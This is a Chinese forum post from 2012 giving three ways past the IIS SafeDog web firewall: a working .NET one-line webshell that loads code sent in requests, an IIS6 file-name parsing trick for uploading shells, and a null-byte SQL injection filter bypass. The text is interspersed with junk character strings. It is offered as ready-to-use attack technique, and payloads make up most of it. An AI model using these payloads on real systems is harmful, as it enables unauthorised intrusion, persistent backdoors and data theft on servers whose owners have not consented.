1、绕过IIS安全狗的一句话。
" c+ s: x' C0 P4 n2 y# ^3 Y前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。" y6 O8 J+ ?. y ~) F4 H- r( W h
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
" l' f* v7 L3 P+ Q; f# R: R5 G4 x" o
2、IIS6.0解析漏洞遇到安全狗。2 \5 F' j: B, ]% S7 M8 C
文件名为9 i, }( e* f7 {* S
http://www.xxxxx.com/sh3llc0de.asp;1.jpg$ K, F8 L) T% e4 G6 f! |/ {2 g
7 M* G( y+ s8 u9 @9 Y这样的会被IIS安全狗果断屏蔽。
( Y, w6 ^" i# d) K$ m7 N* W% L改成如下名称,IIS6一样会解析:5 E6 H. C) o0 b+ j3 }9 f
www.xxxxx.com/;1.asp;1.jpg
; ~/ l7 `9 v5 o, \) n4 ] Y$ k$ `6 y- d! Y9 W7 y. x4 Q* K/ W
3、安全狗的注入绕过。 F! y3 }+ f" ?3 H/ B2 Q
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。2 h7 B0 V& P3 m1 [: d3 v, J
但如果:% u" ?6 F ]) z E
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
# P( A* V# L* d0 U4 Y7 G就可以成功绕过了。# Y$ D- O6 n9 Z7 a* R
3 \/ [8 s5 J0 _7 t) i6 I/ Q ~, H" {% D
|
发表于 2012-10-31 08:25:30
收藏
支持
反对